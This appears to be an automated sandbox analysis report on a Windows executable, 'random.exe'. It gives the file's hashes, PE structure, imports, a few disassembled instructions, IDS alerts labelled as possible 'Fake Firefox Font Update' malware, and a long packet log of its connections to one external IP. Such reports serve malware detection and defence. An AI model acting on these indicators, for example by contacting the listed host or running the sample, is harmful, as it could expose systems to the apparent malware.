                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.71305897419005
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                                                                                                                                  File name:random.exe
                                                                                                                                                                                                                                                                                  File size:2'636'800 bytes
                                                                                                                                                                                                                                                                                  MD5:a9172666da67d245c710fd71407178f1
                                                                                                                                                                                                                                                                                  SHA1:ee8f90321c91171e489d7a8e6a1415f075468eb6
                                                                                                                                                                                                                                                                                  SHA256:ed298ed0a286707fb06ae7ad689e2fe26b948604fca7f9e375a22eda2388adbb
                                                                                                                                                                                                                                                                                  SHA512:db7a4b7215f73e8e3f976ae9390a054971b6e42d09c299d86c82d2a5091a8d9ab2b9fc47580b2bafa16ad1ce74eff5e8f7bc689581199f0a609a8fdc5f0dbfaf
                                                                                                                                                                                                                                                                                  SSDEEP:49152:rYoQhcn8+iezb8XIw13ItW4vsmoNvOgbesU43ZkgFi0/fkhrC+11SqKDZ8gUH9ju:Pz+y4VC68YwiKE
                                                                                                                                                                                                                                                                                  TLSH:A4C54A2B61A9609AE3E7C07CE5065792FC3176485E39A3B724B68392373091C9B7D373
                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....vg.................."..8(..J..W..........@..............................2.......(...`... ............................
                                                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                  Entrypoint:0x140001157
                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                                                  Time Stamp:0x6776E7B8 [Thu Jan 2 19:23:36 2025 UTC]
                                                                                                                                                                                                                                                                                  TLS Callbacks:0x4022d7a0, 0x1, 0x4022d860, 0x1
                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                  Import Hash:9ce1e3b170c9365da5a16f5bce0983b0
                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  sub esp, 30h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 000000FFh
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [00276003h]
                                                                                                                                                                                                                                                                                  mov dword ptr [eax], 00000001h
                                                                                                                                                                                                                                                                                  call 00007F47192DEA52h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  add esp, 30h
                                                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  sub esp, 30h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 000000FFh
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [00275FD4h]
                                                                                                                                                                                                                                                                                  mov dword ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                  call 00007F47192DEA23h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  add esp, 30h
                                                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  sub esp, 70h
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], 00000030h
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-28h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                                                                  jmp 00007F47192DEA33h
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  cmp eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                                                                                  jne 00007F47192DEA1Bh
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 00000001h
                                                                                                                                                                                                                                                                                  jmp 00007F47192DEA57h
                                                                                                                                                                                                                                                                                  mov ecx, 000003E8h
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [00319FB5h]
                                                                                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [00275F7Ch]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-30h], eax
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp+00h], eax
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x31b0000x4d4.idata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x31e0000x178.rsrc
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2780000x756c.pdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x31f0000x3fc.reloc
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x276de00x28.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x31b1700x108.idata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                  .text0x10000x22d8980x22da001ba566df3d7ba406e905f858dfca9c73unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .data0x22f0000xe9900xea00ed9ec624a52a1450be4e17c37ad532c7False0.7278812767094017data7.907353215783904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .rdata0x23e0000x393700x3940062e6150683e0018b3420b1f9a04dc6f1False0.8832346820414847data7.8534439409010455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .pdata0x2780000x756c0x76002d192b22115fa929b7a7d51099770ce8False0.5051972987288136data6.0788567314168125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .xdata0x2800000x58d80x5a00f8eeb088f7b72df899cf78bcc0bd2dddFalse0.16475694444444444, SYS \003\001P3.451396623499527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .bss0x2860000x948600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .idata0x31b0000x4d40x600a2a509be5075d1e02c949bb04e762558False0.3313802083333333data3.609653204427918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .CRT0x31c0000x300x200c27e7a3294b1032d0e919448da6c428cFalse0.05078125data0.19196315608732903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .tls0x31d0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .rsrc0x31e0000x1780x200e8d54dd241051510dbe96416ab7c3e63False0.400390625data2.0943594687221996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .reloc0x31f0000x3fc0x40016fc8c1db9ec8fce8bbe38c2129b7cf8False0.7080078125data5.253227785857478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                  RT_VERSION0x31e0580x11cSVr3 curses screen image, little-endianEnglishUnited States0.5985915492957746
                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                  ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegEnumKeyExA, RegQueryValueExA
                                                                                                                                                                                                                                                                                  KERNEL32.dllGetOEMCP, GetProcAddress, InitializeCriticalSection, LoadLibraryA, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsGetValue, TlsSetValue, VirtualFree, VirtualProtect, VirtualProtectEx, VirtualQuery, VirtualUnlock
                                                                                                                                                                                                                                                                                  msvcrt.dll__C_specific_handler, atexit, calloc, exit, free, malloc, memcpy, memset, realloc, signal
                                                                                                                                                                                                                                                                                  USER32.dllGetKeyNameTextW
                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                  2025-01-03T23:32:28.680095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:32:29.808865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:32:30.640921+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:04.464063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449899188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:05.626111+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449905188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:06.501607+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449911188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:07.302639+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449919188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:08.135993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449927188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:09.105183+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449936188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  2025-01-03T23:33:10.233902+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449942188.114.96.3443TCP
                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:31:57.903515100 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.207838058 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.207865000 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.207926989 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.209655046 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.209662914 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.680010080 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.680094957 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.684674025 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.684680939 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.684895039 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.725043058 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.725056887 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.725061893 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065180063 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065232992 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065305948 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065314054 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065643072 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065666914 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065687895 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065692902 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.065735102 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.066183090 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.066615105 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.066798925 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.066802979 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.069726944 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.070570946 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.070574999 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.122293949 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.150250912 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.150291920 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.150408983 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.150415897 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.153985023 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154031038 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154036045 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154512882 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154556990 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154561043 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154769897 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154794931 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154814005 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154818058 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.154855967 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.155355930 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.155591965 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.155637980 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.155642033 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156088114 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156116962 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156126022 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156131983 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156168938 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156620026 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156826019 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156923056 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.156928062 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157186031 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157223940 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157227993 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157649994 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157692909 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.157696962 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.200418949 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.236450911 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.238846064 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239097118 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239120007 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239140987 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239145994 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239183903 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.239187956 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242551088 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242558956 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242564917 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242610931 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242907047 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.242964983 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243522882 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243570089 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243794918 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243835926 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243839979 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243887901 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243944883 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243957996 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243971109 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243971109 CET49737443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243978024 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.243983984 CET44349737188.114.96.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:29.348714113 CET49738443192.168.2.4188.114.96.3
